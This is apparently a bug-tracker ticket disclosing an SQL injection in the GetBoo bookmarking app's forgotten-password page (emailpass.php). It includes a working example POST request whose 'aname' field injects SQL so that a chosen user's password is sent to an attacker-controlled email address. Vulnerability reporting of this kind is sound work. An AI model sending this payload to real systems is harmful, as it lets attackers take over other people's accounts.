Menu

#25 GetBoo Email Forgotten Password SQL injection

new
Chuck
None
GetBoo
High
Current
2014-09-11
2012-03-05
No

An attacker can leverage a POST to emailpass.php to send users passwords to an attacker-defined email address. This is done through an SQL injection vulnerability in the 'aname' field.

Example request

POST /getboo/emailpass.php HTTP/1.1
{snip}
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

aname=') OR name='user' -- &email=attacker@pwn.com&newBtn=New+Password%21

Discussion


Log in to post a comment.